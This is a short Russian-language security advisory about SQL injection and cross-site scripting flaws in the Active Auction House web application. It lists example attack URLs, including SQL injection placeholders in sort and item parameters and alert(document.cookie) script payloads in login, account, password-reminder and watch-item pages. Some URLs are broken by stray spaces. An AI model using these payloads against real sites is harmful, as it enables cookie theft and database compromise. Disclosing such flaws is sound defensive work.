Программа: Active Auction House
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.
Уязвимость существует из-за недостаточной обработки входных данных в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Примеры:
http://[target]/activeauctionsuperstore/default.asp? Sortby=ItemName&SortDir='SQL_INJECTION
http://[target]/activeauctionsuperstore/default.asp? Sortby='SQL_INJECTION
http://[target]/activeauctionsuperstore/ItemInfo.asp? itemID='SQL_INJECTION
http://[ta rget]/activeauctionsuperstore/default.asp? catid='SQL_ERROR
Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/activeauctionsuperstore/?ReturnURL='%3E%3Cscript% 3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
http://[target]/activeauctionsuperstore/?ReturnURL=start.asp&username =dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/activeauctionsuperstore/?ReturnURL=start.asp&username
='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
http://[target]/activeauctionsuperstore/account.asp?ReturnURL=%22%
3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/activeauctionsuperstore/sendpassword.asp?Table=Accounts &Title='php_evil_valuehttp://localhost/activeauctionsuperstore/
sendpassword.asp?Table=Accounts&Title= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/activeauctionsuperstore/sendpassword.asp?Table=Accounts &Title="><script>alert(document.cookie)</script>
http://[target]/activeauctionsuperstore/se ndpassword.asp?Table="> <script>
alert(document.cookie)</script>&Title=Account
http://[target]/activeauctionsuperstore/watchthisitem.asp?itemid="><script>
alert(document.cookie)</script>&%3baccountid=